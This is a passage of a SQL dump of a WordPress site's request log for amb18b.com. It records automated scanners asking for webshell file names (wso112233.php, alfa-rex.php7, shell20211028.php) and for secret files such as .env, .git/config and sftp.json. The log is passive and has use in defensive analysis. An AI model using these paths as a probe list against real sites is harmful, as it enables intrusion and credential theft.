02:02:46'),(9454,'https://amb18b.com/wp-includes/dropdown.php','41.199.153.93','https://www.bing.com/',1,'2025-11-23 02:02:50','2025-11-23 02:02:50'),(9455,'https://amb18b.com/wp-admin/dropdown.php','11.116.3.122','https://www.yahoo.com/',1,'2025-11-23 02:02:51','2025-11-23 02:02:51'),(9456,'https://amb18b.com/alfa-rex.php7','86.122.1.65','https://www.google.de/',1,'2025-11-23 02:02:53','2025-11-23 02:02:53'),(9457,'https://amb18b.com/alfanew.php','173.226.178.125','https://www.bing.com/',1,'2025-11-23 02:02:55','2025-11-23 02:02:55'),(9458,'https://amb18b.com/wp-admin/js/widgets/about.php7','157.168.106.76','https://www.yahoo.com/',1,'2025-11-23 02:02:59','2025-11-23 02:02:59'),(9459,'https://amb18b.com/wp-p.php7','245.214.185.188','https://www.yahoo.com/',1,'2025-11-23 02:03:00','2025-11-23 02:03:00'),(9460,'https://amb18b.com/wp-admin/repeater.php','143.154.183.7','https://www.bing.com/',1,'2025-11-23 02:03:02','2025-11-23 02:03:02'),(9461,'https://amb18b.com/wp-includes/repeater.php','239.47.125.14','https://www.google.com/',1,'2025-11-23 02:03:04','2025-11-23 02:03:04'),(9462,'https://amb18b.com/wsoyanz.php','34.185.187.108','https://www.google.co.uk/',1,'2025-11-23 02:03:07','2025-11-23 02:03:07'),(9463,'https://amb18b.com/yanz.php','110.211.236.142','https://www.google.de/',1,'2025-11-23 02:03:09','2025-11-23 02:03:09'),(9464,'https://amb18b.com/wp-admin/js/about.php','138.56.183.226','https://www.bing.com/',1,'2025-11-23 02:03:11','2025-11-23 02:03:11'),(9465,'https://amb18b.com/cache-compat.php','183.120.65.70','https://www.google.co.uk/',1,'2025-11-23 02:03:16','2025-11-23 02:03:16'),(9466,'https://amb18b.com/ajax-actions.php','125.171.114.35','https://www.google.fr/',1,'2025-11-23 02:03:18','2025-11-23 02:03:18'),(9467,'https://amb18b.com/wp-admin/ajax-actions.php','206.107.18.253','https://www.bing.com/',1,'2025-11-23 02:03:20','2025-11-23 02:03:20'),(9468,'https://amb18b.com/wp-consar.php','9.116.233.210','https://www.google.co.uk/',1,'2025-11-23 02:03:21','2025-11-23 02:03:21'),(9469,'https://amb18b.com/repeater.php','48.58.37.173','https://www.yahoo.com/',1,'2025-11-23 02:03:23','2025-11-23 02:03:23'),(9470,'https://amb18b.com/admin-post.php','124.197.178.77','https://www.google.de/',1,'2025-11-23 02:03:25','2025-11-23 02:03:25'),(9471,'https://amb18b.com/wp-admin/maint/maint/ajax-actions.php','59.178.18.171','https://www.google.fr/',1,'2025-11-23 02:03:27','2025-11-23 02:03:27'),(9472,'https://amb18b.com/wp-admin/css/index.php','151.143.73.53','https://www.google.fr/',1,'2025-11-23 02:03:28','2025-11-23 02:03:28'),(9473,'https://amb18b.com/about.php','40.57.183.76','https://www.google.co.uk/',1,'2025-11-23 02:03:30','2025-11-23 02:03:30'),(9474,'https://amb18b.com/about.php7','202.6.191.152','https://www.google.fr/',1,'2025-11-23 02:03:32','2025-11-23 02:03:32'),(9475,'https://amb18b.com/alfanew.php7','96.159.121.72','https://www.google.com/',1,'2025-11-23 02:03:34','2025-11-23 02:03:34'),(9476,'https://amb18b.com/adminfuns.php7','48.123.226.157','https://www.google.com/',1,'2025-11-23 02:03:35','2025-11-23 02:03:35'),(9477,'https://amb18b.com/ebs.php7','74.215.236.166','https://www.google.de/',1,'2025-11-23 02:03:37','2025-11-23 02:03:37'),(9478,'https://amb18b.com/ws.php7','254.112.91.226','https://www.yahoo.com/',1,'2025-11-23 02:03:39','2025-11-23 02:03:39'),(9479,'https://amb18b.com/alfanew2.php7','149.39.10.70','https://www.google.co.uk/',1,'2025-11-23 02:03:40','2025-11-23 02:03:40'),(9480,'https://amb18b.com/alfa-rex2.php7','249.31.147.65','https://www.google.com/',1,'2025-11-23 02:03:42','2025-11-23 02:03:42'),(9481,'https://amb18b.com/ioxi-rex4.php7','168.91.28.118','https://duckduckgo.com/',1,'2025-11-23 02:03:44','2025-11-23 02:03:44'),(9482,'https://amb18b.com/xmlrpc.php','103.92.213.5','Direct Access',1,'2025-11-23 06:49:51','2025-11-23 06:49:51'),(9483,'https://amb18b.com/xmlrpc.php','116.74.68.207','Direct Access',1,'2025-11-23 06:50:59','2025-11-23 06:50:59'),(9484,'https://amb18b.com//megabet333.biz/wp-includes/js/dist/i18n.min.js','18.236.67.123','Direct Access',1,'2025-11-23 09:26:21','2025-11-23 09:26:21'),(9485,'https://amb18b.com//megabet333.biz/wp-includes/js/dist/hooks.min.js','18.236.67.123','Direct Access',1,'2025-11-23 09:26:21','2025-11-23 09:26:21'),(9486,'https://amb18b.com//megabet333.biz/wp-includes/js/jquery/jquery-migrate.min.js','18.236.67.123','Direct Access',1,'2025-11-23 09:26:21','2025-11-23 09:26:21'),(9487,'https://amb18b.com//megabet333.biz/wp-includes/js/jquery/jquery.min.js','18.236.67.123','Direct Access',1,'2025-11-23 09:26:21','2025-11-23 09:26:21'),(9488,'https://amb18b.com//megabet333.biz/wp-includes/js/jquery/ui/core.min.js','18.236.67.123','Direct Access',1,'2025-11-23 09:26:21','2025-11-23 09:26:21'),(9489,'https://amb18b.com/default.js','18.236.67.123','Direct Access',1,'2025-11-23 09:26:21','2025-11-23 09:26:21'),(9490,'https://amb18b.com//static.cloudflareinsights.com/beacon.min.js','18.236.67.123','Direct Access',1,'2025-11-23 09:26:21','2025-11-23 09:26:21'),(9491,'https://amb18b.com/wp-emoji-release.min.js','18.236.67.123','Direct Access',1,'2025-11-23 09:26:23','2025-11-23 09:26:23'),(9492,'https://amb18b.com/Alvin9999/https/fanfan1.net/daohang/','180.95.231.57','Direct Access',1,'2025-11-23 11:23:17','2025-11-23 11:23:17'),(9493,'https://amb18b.com/officialsite','180.95.231.57','Direct Access',1,'2025-11-23 11:23:20','2025-11-23 11:23:20'),(9494,'https://amb18b.com/static/favicon.ico','180.95.231.57','Direct Access',1,'2025-11-23 11:23:30','2025-11-23 11:23:30'),(9495,'https://amb18b.com/images/logo-cn-352x97_1.png','180.95.231.57','Direct Access',1,'2025-11-23 11:23:32','2025-11-23 11:23:32'),(9496,'https://amb18b.com/assets/images/logo-cn-vpnweb.png','180.95.231.57','Direct Access',1,'2025-11-23 11:23:36','2025-11-23 11:23:36'),(9497,'https://amb18b.com/static/images/home/VPNlogo.png','180.95.231.57','Direct Access',1,'2025-11-23 11:23:39','2025-11-23 11:23:39'),(9498,'https://amb18b.com/img/logo.png','180.95.231.57','Direct Access',1,'2025-11-23 11:23:44','2025-11-23 11:23:44'),(9499,'https://amb18b.com/static/icon/bjch.png','180.95.231.57','Direct Access',1,'2025-11-23 11:23:50','2025-11-23 11:23:50'),(9500,'https://amb18b.com/assets/images/icon-vpnweb.ico','180.95.231.57','Direct Access',1,'2025-11-23 11:23:54','2025-11-23 11:23:54'),(9501,'https://amb18b.com/assets/images/official-site/favicon.ico','180.95.231.57','Direct Access',1,'2025-11-23 11:23:57','2025-11-23 11:23:57'),(9502,'https://amb18b.com/v1/file/icon/seo/cdc3fff6-6034-46fb-8ef3-1746e374d4fc.png','180.95.231.57','Direct Access',1,'2025-11-23 11:24:01','2025-11-23 11:24:01'),(9503,'https://amb18b.com/fav-icon.ico','180.95.231.57','Direct Access',1,'2025-11-23 11:24:04','2025-11-23 11:24:04'),(9504,'https://amb18b.com/image/logo.ico','180.95.231.57','Direct Access',1,'2025-11-23 11:24:06','2025-11-23 11:24:06'),(9505,'https://amb18b.com/images/default.png','180.95.231.57','Direct Access',1,'2025-11-23 11:24:09','2025-11-23 11:24:09'),(9506,'https://amb18b.com/static/image/logo2.png','180.95.231.57','Direct Access',1,'2025-11-23 11:24:11','2025-11-23 11:24:11'),(9507,'https://amb18b.com/themes/custom/ahaspeed/favicon.ico','180.95.231.57','Direct Access',1,'2025-11-23 11:24:14','2025-11-23 11:24:14'),(9508,'https://amb18b.com/image/favicon.png','180.95.231.57','Direct Access',1,'2025-11-23 11:24:18','2025-11-23 11:24:18'),(9509,'https://amb18b.com/image/favicon.ico','180.95.231.57','Direct Access',1,'2025-11-23 11:24:22','2025-11-23 11:24:22'),(9510,'https://amb18b.com/images/log1.png','180.95.231.57','Direct Access',1,'2025-11-23 11:24:25','2025-11-23 11:24:25'),(9511,'https://amb18b.com/details/images/favicon.ico','180.95.231.57','Direct Access',1,'2025-11-23 11:24:27','2025-11-23 11:24:27'),(9512,'https://amb18b.com/images/favicon.png','180.95.231.57','Direct Access',1,'2025-11-23 11:24:33','2025-11-23 11:24:33'),(9513,'https://amb18b.com/txpro/img/html_icon.ico','180.95.231.57','Direct Access',1,'2025-11-23 11:24:36','2025-11-23 11:24:36'),(9514,'https://amb18b.com/assets/fire_admin/images/logo.png','180.95.231.57','Direct Access',1,'2025-11-23 11:24:39','2025-11-23 11:24:39'),(9515,'https://amb18b.com/statics/abc/images/tu/abcpppin_03.png','180.95.231.57','Direct Access',1,'2025-11-23 11:24:43','2025-11-23 11:24:43'),(9516,'https://amb18b.com/images/pc/logo.png','111.224.219.140','Direct Access',1,'2025-11-23 11:25:20','2025-11-23 11:25:20'),(9517,'https://amb18b.com/images/favicon-icon.png','111.224.219.140','Direct Access',1,'2025-11-23 11:25:23','2025-11-23 11:25:23'),(9518,'https://amb18b.com/images/favicon-196x196.png','111.224.219.140','Direct Access',1,'2025-11-23 11:25:26','2025-11-23 11:25:26'),(9519,'https://amb18b.com/assets/img/favicon.png','111.224.219.140','Direct Access',1,'2025-11-23 11:25:28','2025-11-23 11:25:28'),(9520,'https://amb18b.com/static/images/logo.png','111.224.219.140','Direct Access',1,'2025-11-23 11:25:31','2025-11-23 11:25:31'),(9521,'https://amb18b.com/images/favicon.ico','111.224.219.140','Direct Access',1,'2025-11-23 11:25:33','2025-11-23 11:25:33'),(9522,'https://amb18b.com/static/picture/logo_jg2.png','111.224.219.140','Direct Access',1,'2025-11-23 11:25:36','2025-11-23 11:25:36'),(9523,'https://amb18b.com/favicon.png','111.224.219.140','Direct Access',1,'2025-11-23 11:25:38','2025-11-23 11:25:38'),(9524,'https://amb18b.com/theme/Bob-Theme-Argon/favicon.ico','111.224.219.140','Direct Access',1,'2025-11-23 11:25:42','2025-11-23 11:25:42'),(9525,'https://amb18b.com/imgs/logox.png','111.224.219.140','Direct Access',1,'2025-11-23 11:25:44','2025-11-23 11:25:44'),(9526,'https://amb18b.com/assets/index/kuailian/image/favicon.ico','111.224.219.140','Direct Access',1,'2025-11-23 11:25:47','2025-11-23 11:25:47'),(9527,'https://amb18b.com/img/logo_512.png','111.224.219.140','Direct Access',1,'2025-11-23 11:25:49','2025-11-23 11:25:49'),(9528,'https://amb18b.com/Alvin9999/https/fanfan1.net/daohang/','120.0.52.186','Direct Access',1,'2025-11-23 11:26:27','2025-11-23 11:26:27'),(9529,'https://amb18b.com/officialsite','120.0.52.186','Direct Access',1,'2025-11-23 11:26:30','2025-11-23 11:26:30'),(9530,'https://amb18b.com/static/favicon.ico','120.0.52.186','Direct Access',1,'2025-11-23 11:26:35','2025-11-23 11:26:35'),(9531,'https://amb18b.com/images/logo-cn-352x97_1.png','120.0.52.186','Direct Access',1,'2025-11-23 11:26:38','2025-11-23 11:26:38'),(9532,'https://amb18b.com/assets/images/logo-cn-vpnweb.png','120.0.52.186','Direct Access',1,'2025-11-23 11:26:41','2025-11-23 11:26:41'),(9533,'https://amb18b.com/static/images/home/VPNlogo.png','120.0.52.186','Direct Access',1,'2025-11-23 11:26:43','2025-11-23 11:26:43'),(9534,'https://amb18b.com/img/logo.png','120.0.52.186','Direct Access',1,'2025-11-23 11:26:46','2025-11-23 11:26:46'),(9535,'https://amb18b.com/static/icon/bjch.png','120.0.52.186','Direct Access',1,'2025-11-23 11:26:48','2025-11-23 11:26:48'),(9536,'https://amb18b.com/assets/images/icon-vpnweb.ico','120.0.52.186','Direct Access',1,'2025-11-23 11:26:51','2025-11-23 11:26:51'),(9537,'https://amb18b.com/assets/images/official-site/favicon.ico','120.0.52.186','Direct Access',1,'2025-11-23 11:26:53','2025-11-23 11:26:53'),(9538,'https://amb18b.com/v1/file/icon/seo/cdc3fff6-6034-46fb-8ef3-1746e374d4fc.png','120.0.52.186','Direct Access',1,'2025-11-23 11:26:56','2025-11-23 11:26:56'),(9539,'https://amb18b.com/fav-icon.ico','120.0.52.186','Direct Access',1,'2025-11-23 11:26:58','2025-11-23 11:26:58'),(9540,'https://amb18b.com/image/logo.ico','120.0.52.186','Direct Access',1,'2025-11-23 11:27:01','2025-11-23 11:27:01'),(9541,'https://amb18b.com/images/default.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:03','2025-11-23 11:27:03'),(9542,'https://amb18b.com/static/image/logo2.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:06','2025-11-23 11:27:06'),(9543,'https://amb18b.com/themes/custom/ahaspeed/favicon.ico','120.0.52.186','Direct Access',1,'2025-11-23 11:27:09','2025-11-23 11:27:09'),(9544,'https://amb18b.com/image/favicon.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:12','2025-11-23 11:27:12'),(9545,'https://amb18b.com/image/favicon.ico','120.0.52.186','Direct Access',1,'2025-11-23 11:27:15','2025-11-23 11:27:15'),(9546,'https://amb18b.com/images/log1.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:17','2025-11-23 11:27:17'),(9547,'https://amb18b.com/details/images/favicon.ico','120.0.52.186','Direct Access',1,'2025-11-23 11:27:20','2025-11-23 11:27:20'),(9548,'https://amb18b.com/images/favicon.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:23','2025-11-23 11:27:23'),(9549,'https://amb18b.com/txpro/img/html_icon.ico','120.0.52.186','Direct Access',1,'2025-11-23 11:27:25','2025-11-23 11:27:25'),(9550,'https://amb18b.com/assets/fire_admin/images/logo.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:28','2025-11-23 11:27:28'),(9551,'https://amb18b.com/statics/abc/images/tu/abcpppin_03.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:31','2025-11-23 11:27:31'),(9552,'https://amb18b.com/images/pc/logo.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:34','2025-11-23 11:27:34'),(9553,'https://amb18b.com/images/favicon-icon.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:36','2025-11-23 11:27:36'),(9554,'https://amb18b.com/images/favicon-196x196.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:39','2025-11-23 11:27:39'),(9555,'https://amb18b.com/assets/img/favicon.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:41','2025-11-23 11:27:41'),(9556,'https://amb18b.com/static/images/logo.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:44','2025-11-23 11:27:44'),(9557,'https://amb18b.com/images/favicon.ico','120.0.52.186','Direct Access',1,'2025-11-23 11:27:47','2025-11-23 11:27:47'),(9558,'https://amb18b.com/static/picture/logo_jg2.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:50','2025-11-23 11:27:50'),(9559,'https://amb18b.com/favicon.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:54','2025-11-23 11:27:54'),(9560,'https://amb18b.com/theme/Bob-Theme-Argon/favicon.ico','120.0.52.186','Direct Access',1,'2025-11-23 11:27:56','2025-11-23 11:27:56'),(9561,'https://amb18b.com/imgs/logox.png','120.0.52.186','Direct Access',1,'2025-11-23 11:27:59','2025-11-23 11:27:59'),(9562,'https://amb18b.com/assets/index/kuailian/image/favicon.ico','120.0.52.186','Direct Access',1,'2025-11-23 11:28:02','2025-11-23 11:28:02'),(9563,'https://amb18b.com/img/logo_512.png','120.0.52.186','Direct Access',1,'2025-11-23 11:28:04','2025-11-23 11:28:04'),(9564,'https://amb18b.com/graphql','207.154.212.47','Direct Access',1,'2025-11-23 12:05:12','2025-11-23 12:05:12'),(9565,'https://amb18b.com/api','207.154.212.47','Direct Access',1,'2025-11-23 12:05:14','2025-11-23 12:05:14'),(9566,'https://amb18b.com/api/graphql','207.154.212.47','Direct Access',1,'2025-11-23 12:05:15','2025-11-23 12:05:15'),(9567,'https://amb18b.com/graphql/api','207.154.212.47','Direct Access',1,'2025-11-23 12:05:17','2025-11-23 12:05:17'),(9568,'https://amb18b.com/api/gql','207.154.212.47','Direct Access',1,'2025-11-23 12:05:19','2025-11-23 12:05:19'),(9569,'https://amb18b.com/swagger-ui.html','207.154.212.47','Direct Access',1,'2025-11-23 12:05:20','2025-11-23 12:05:20'),(9570,'https://amb18b.com/swagger/index.html','207.154.212.47','Direct Access',1,'2025-11-23 12:05:22','2025-11-23 12:05:22'),(9571,'https://amb18b.com/swagger/swagger-ui.html','207.154.212.47','Direct Access',1,'2025-11-23 12:05:25','2025-11-23 12:05:25'),(9572,'https://amb18b.com/webjars/swagger-ui/index.html','207.154.212.47','Direct Access',1,'2025-11-23 12:05:26','2025-11-23 12:05:26'),(9573,'https://amb18b.com/swagger.json','207.154.212.47','Direct Access',1,'2025-11-23 12:05:27','2025-11-23 12:05:27'),(9574,'https://amb18b.com/swagger/v1/swagger.json','207.154.212.47','Direct Access',1,'2025-11-23 12:05:29','2025-11-23 12:05:29'),(9575,'https://amb18b.com/@vite/env','207.154.212.47','Direct Access',1,'2025-11-23 12:05:30','2025-11-23 12:05:30'),(9576,'https://amb18b.com/actuator/env','207.154.212.47','Direct Access',1,'2025-11-23 12:05:32','2025-11-23 12:05:32'),(9577,'https://amb18b.com/server','207.154.212.47','Direct Access',1,'2025-11-23 12:05:33','2025-11-23 12:05:33'),(9578,'https://amb18b.com/.vscode/sftp.json','207.154.212.47','Direct Access',1,'2025-11-23 12:05:35','2025-11-23 12:05:35'),(9579,'https://amb18b.com/about','207.154.212.47','Direct Access',1,'2025-11-23 12:05:36','2025-11-23 12:05:36'),(9580,'https://amb18b.com/debug/default/view?panel=config','207.154.212.47','Direct Access',1,'2025-11-23 12:05:37','2025-11-23 12:05:37'),(9581,'https://amb18b.com/v2/_catalog','207.154.212.47','Direct Access',1,'2025-11-23 12:05:39','2025-11-23 12:05:39'),(9582,'https://amb18b.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application','207.154.212.47','Direct Access',1,'2025-11-23 12:05:41','2025-11-23 12:05:41'),(9583,'https://amb18b.com/server-status','207.154.212.47','Direct Access',1,'2025-11-23 12:05:42','2025-11-23 12:05:42'),(9584,'https://amb18b.com/login.action','207.154.212.47','Direct Access',1,'2025-11-23 12:05:44','2025-11-23 12:05:44'),(9585,'https://amb18b.com/_all_dbs','207.154.212.47','Direct Access',1,'2025-11-23 12:05:45','2025-11-23 12:05:45'),(9586,'https://amb18b.com/.DS_Store','207.154.212.47','Direct Access',1,'2025-11-23 12:05:47','2025-11-23 12:05:47'),(9587,'https://amb18b.com/.env','207.154.212.47','Direct Access',1,'2025-11-23 12:05:49','2025-11-23 12:05:49'),(9588,'https://amb18b.com/.git/config','207.154.212.47','Direct Access',1,'2025-11-23 12:05:50','2025-11-23 12:05:50'),(9589,'https://amb18b.com/s/7383e2934313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties','207.154.212.47','Direct Access',1,'2025-11-23 12:05:52','2025-11-23 12:05:52'),(9590,'https://amb18b.com/config.json','207.154.212.47','Direct Access',1,'2025-11-23 12:05:53','2025-11-23 12:05:53'),(9591,'https://amb18b.com/telescope/requests','207.154.212.47','Direct Access',1,'2025-11-23 12:05:54','2025-11-23 12:05:54'),(9592,'https://amb18b.com/info.php','207.154.212.47','Direct Access',1,'2025-11-23 12:05:55','2025-11-23 12:05:55'),(9593,'https://amb18b.com/xmrlpc.php','100.14.15.200','https://www.google.co.uk/',1,'2025-11-23 16:38:37','2025-11-23 16:38:37'),(9594,'https://amb18b.com/abcd.php','30.172.85.100','https://www.yahoo.com/',1,'2025-11-23 16:38:40','2025-11-23 16:38:40'),(9595,'https://amb18b.com/admin.php','168.143.255.99','https://www.google.de/',1,'2025-11-23 16:38:42','2025-11-23 16:38:42'),(9596,'https://amb18b.com/info.php','102.237.40.42','https://www.bing.com/',1,'2025-11-23 16:38:43','2025-11-23 16:38:43'),(9597,'https://amb18b.com/edit.php','213.225.221.84','https://duckduckgo.com/',1,'2025-11-23 16:38:45','2025-11-23 16:38:45'),(9598,'https://amb18b.com/moon.php','68.155.230.6','https://www.google.fr/',1,'2025-11-23 16:38:47','2025-11-23 16:38:47'),(9599,'https://amb18b.com/classwithtostring.php','79.22.49.187','https://www.yahoo.com/',1,'2025-11-23 16:38:49','2025-11-23 16:38:49'),(9600,'https://amb18b.com/file4.php','113.56.1.156','https://www.google.co.uk/',1,'2025-11-23 16:38:50','2025-11-23 16:38:50'),(9601,'https://amb18b.com/ioxi-o.php','199.13.12.137','https://www.yahoo.com/',1,'2025-11-23 16:38:52','2025-11-23 16:38:52'),(9602,'https://amb18b.com/wp-good.php','135.112.44.11','https://www.google.co.uk/',1,'2025-11-23 16:38:54','2025-11-23 16:38:54'),(9603,'https://amb18b.com/ds.php','57.133.76.70','https://www.bing.com/',1,'2025-11-23 16:38:55','2025-11-23 16:38:55'),(9604,'https://amb18b.com/bolt.php','1.174.224.152','https://www.bing.com/',1,'2025-11-23 16:38:57','2025-11-23 16:38:57'),(9605,'https://amb18b.com/new.php','2.239.198.249','https://www.google.co.uk/',1,'2025-11-23 16:38:59','2025-11-23 16:38:59'),(9606,'https://amb18b.com/.well-known/index.php','221.191.8.240','https://www.google.de/',1,'2025-11-23 16:39:00','2025-11-23 16:39:00'),(9607,'https://amb18b.com/.well-known/acme-challenge/index.php','51.240.153.244','https://www.google.com/',1,'2025-11-23 16:39:02','2025-11-23 16:39:02'),(9608,'https://amb18b.com/wp-includes/Requests/Text/index.php','187.163.222.153','https://www.google.co.uk/',1,'2025-11-23 16:39:04','2025-11-23 16:39:04'),(9609,'https://amb18b.com/wp-includes/Requests/Text/admin.php','236.111.195.231','https://www.google.co.uk/',1,'2025-11-23 16:39:06','2025-11-23 16:39:06'),(9610,'https://amb18b.com/.well-known/wso112233.php','1.183.136.68','https://www.yahoo.com/',1,'2025-11-23 16:39:08','2025-11-23 16:39:08'),(9611,'https://amb18b.com/wso112233.php','254.19.240.34','https://www.bing.com/',1,'2025-11-23 16:39:09','2025-11-23 16:39:09'),(9612,'https://amb18b.com/.well-knownold/wso112233.php','50.248.230.237','https://www.google.de/',1,'2025-11-23 16:39:11','2025-11-23 16:39:11'),(9613,'https://amb18b.com/.well-known/acme-challenge/wso112233.php','171.23.151.181','https://www.google.co.uk/',1,'2025-11-23 16:39:13','2025-11-23 16:39:13'),(9614,'https://amb18b.com/.well-known/pkivalidation/wso112233.php','35.243.81.178','https://www.google.de/',1,'2025-11-23 16:39:14','2025-11-23 16:39:14'),(9615,'https://amb18b.com/wp-includes/wso112233.php','3.31.107.157','https://duckduckgo.com/',1,'2025-11-23 16:39:21','2025-11-23 16:39:21'),(9616,'https://amb18b.com/wp-admin/wso112233.php','170.235.22.152','https://www.bing.com/',1,'2025-11-23 16:39:23','2025-11-23 16:39:23'),(9617,'https://amb18b.com/.well-known/shell20211028.php','143.227.28.41','https://duckduckgo.com/',1,'2025-11-23 16:39:26','2025-11-23 16:39:26'),(9618,'https://amb18b.com/shell20211028.php','169.66.98.160','https://www.bing.com/',1,'2025-11-23 16:39:28','2025-11-23 16:39:28'),(9619,'https://amb18b.com/.well-knownold/shell20211028.php','4.213.53.66','https://www.google.fr/',1,'2025-11-23 16:39:29','2025-11-23 16:39:29'),(9620,'https://amb18b.com/.well-known/acme-challenge/shell20211028.php','111.83.244.3','https://www.google.fr/',1,'2025-11-23 16:39:31','2025-11-23 16:39:31'),(9621,'https://amb18b.com/.well-known/pkivalidation/shell20211028.php','41.55.193.149','https://www.google.fr/',1,'2025-11-23 16:39:32','2025-11-23 16:39:32'),(9622,'https://amb18b.com/wp-includes/shell20211028.php','171.194.47.215','https://www.bing.com/',1,'2025-11-23 16:39:39','2025-11-23 16:39:39'),(9623,'https://amb18b.com/wp-admin/shell20211028.php','155.247.48.41','https://www.google.co.uk/',1,'2025-11-23 16:39:41','2025-11-23 16:39:41'),(9624,'https://amb18b.com/.well-known/bala.php','19.113.74.233','https://www.yahoo.com/',1,'2025-11-23 16:39:44','2025-11-23 16:39:44'),(9625,'https://amb18b.com/bala.php','71.0.17.133','https://www.google.com/',1,'2025-11-23 16:39:45','2025-11-23 16:39:45'),(9626,'https://amb18b.com/.well-knownold/bala.php','98.223.222.218','https://www.bing.com/',1,'2025-11-23 16:39:47','2025-11-23 16:39:47'),(9627,'https://amb18b.com/.well-known/acme-challenge/bala.php','102.83.175.53','https://www.yahoo.com/',1,'2025-11-23 16:39:49','2025-11-23 16:39:49'),(9628,'https://amb18b.com/.well-known/pkivalidation/bala.php','84.169.93.246','https://duckduckgo.com/',1,'2025-11-23 16:39:50','2025-11-23 16:39:50'),(9629,'https://amb18b.com/wp-includes/bala.php','61.111.223.148','https://www.google.fr/',1,'2025-11-23 16:39:57','2025-11-23 16:39:57'),(9630,'https://amb18b.com/wp-admin/bala.php','173.15.160.89','https://www.google.fr/',1,'2025-11-23 16:39:59','2025-11-23 16:39:59'),(9631,'https://amb18b.com/dropdown.php','177.82.125.68','https://www.google.com/',1,'2025-11-23 16:40:02','2025-11-23 16:40:02'),(9632,'https://amb18b.com/wp-includes/dropdown.php','139.140.219.242','https://www.google.com/',1,'2025-11-23 16:40:05','2025-11-23 16:40:05'),(9633,'https://amb18b.com/wp-admin/dropdown.php','149.13.229.76','https://www.google.co.uk/',1,'2025-11-23 16:40:07','2025-11-23 16:40:07'),(9634,'https://amb18b.com/alfa-rex.php7','53.185.174.11','https://duckduckgo.com/',1,'2025-11-23 16:40:08','2025-11-23 16:40:08'),(9635,'https://amb18b.com/alfanew.php','21.65.193.102','https://www.google.co.uk/',1,'2025-11-23 16:40:10','2025-11-23 16:40:10'),(9636,'https://amb18b.com/wp-admin/js/widgets/about.php7','34.239.3.161','https://www.google.com/',1,'2025-11-23 16:40:13','2025-11-23 16:40:13'),(9637,'https://amb18b.com/wp-p.php7','12.124.127.233','https://www.yahoo.com/',1,'2025-11-23 16:40:15','2025-11-23 16:40:15'),(9638,'https://amb18b.com/wp-admin/repeater.php','89.253.70.204','https://www.bing.com/',1,'2025-11-23 16:40:16','2025-11-23 16:40:16'),(9639,'https://amb18b.com/wp-includes/repeater.php','158.100.193.36','https://www.bing.com/',1,'2025-11-23 16:40:18','2025-11-23 16:40:18'),(9640,'https://amb18b.com/wsoyanz.php','104.218.83.195','https://www.google.de/',1,'2025-11-23 16:40:21','2025-11-23 16:40:21'),(9641,'https://amb18b.com/yanz.php','147.7.55.20','https://www.google.co.uk/',1,'2025-11-23 16:40:23','2025-11-23 16:40:23'),(9642,'https://amb18b.com/wp-admin/js/about.php','70.190.5.2','https://www.google.com/',1,'2025-11-23 16:40:24','2025-11-23 16:40:24'),(9643,'https://amb18b.com/cache-compat.php','66.221.133.225','https://www.google.de/',1,'2025-11-23 16:40:29','2025-11-23 16:40:29'),(9644,'https://amb18b.com/ajax-actions.php','186.63.18.163','https://www.bing.com/',1,'2025-11-23 16:40:31','2025-11-23 16:40:31'),(9645,'https://amb18b.com/wp-admin/ajax-actions.php','47.32.158.42','https://www.bing.com/',1,'2025-11-23 16:40:32','2025-11-23 16:40:32'),(9646,'https://amb18b.com/wp-consar.php','165.209.107.118','https://www.google.co.uk/',1,'2025-11-23 16:40:34','2025-11-23 16:40:34'),(9647,'https://amb18b.com/repeater.php','192.25.178.125','https://duckduckgo.com/',1,'2025-11-23 16:40:36','2025-11-23 16:40:36'),(9648,'https://amb18b.com/admin-post.php','107.65.125.169','https://www.yahoo.com/',1,'2025-11-23 16:40:37','2025-11-23 16:40:37'),(9649,'https://amb18b.com/wp-admin/maint/maint/ajax-actions.php','100.41.74.138','https://www.google.co.uk/',1,'2025-11-23 16:40:39','2025-11-23 16:40:39'),(9650,'https://amb18b.com/wp-admin/css/index.php','83.203.174.86','https://www.google.co.uk/',1,'2025-11-23 16:40:40','2025-11-23 16:40:40'),(9651,'https://amb18b.com/about.php','218.193.23.141','https://www.bing.com/',1,'2025-11-23 16:40:42','2025-11-23 16:40:42'),(9652,'https://amb18b.com/about.php7','31.183.109.134','https://www.bing.com/',1,'2025-11-23 16:40:44','2025-11-23 16:40:44'),(9653,'https://amb18b.com/alfanew.php7','204.58.37.91','https://www.bing.com/',1,'2025-11-23 16:40:45','2025-11-23 16:40:45'),(9654,'https://amb18b.com/adminfuns.php7','45.253.255.71','https://www.google.de/',1,'2025-11-23 16:40:47','2025-11-23 16:40:47'),(9655,'https://amb18b.com/ebs.php7','241.167.140.83','https://www.bing.com/',1,'2025-11-23 16:40:49','2025-11-23 16:40:49'),(9656,'https://amb18b.com/ws.php7','192.43.191.191','https://www.google.co.uk/',1,'2025-11-23 16:40:51','2025-11-23 16:40:51'),(9657,'https://amb18b.com/alfanew2.php7','14.27.5.35','https://www.bing.com/',1,'2025-11-23 16:40:52','2025-11-23 16:40:52'),(9658,'https://amb18b.com/alfa-rex2.php7','198.154.168.211','https://www.bing.com/',1,'2025-11-23 16:40:54','2025-11-23 16:40:54'),(9659,'https://amb18b.com/ioxi-rex4.php7','54.216.171.96','https://www.bing.com/',1,'2025-11-23 16:40:55','2025-11-23 16:40:55'),(9660,'https://amb18b.com//wp-includes/wlwmanifest.xml','159.89.184.20','Direct Access',1,'2025-11-23 18:42:52','2025-11-23 18:42:52'),(9661,'https://amb18b.com//xmlrpc.php?rsd','159.89.184.20','Direct Access',1,'2025-11-23 18:42:53','2025-11-23 18:42:53'),(9662,'https://amb18b.com//?author=2','159.89.184.20','Direct Access',1,'2025-11-23 18:42:57','2025-11-23 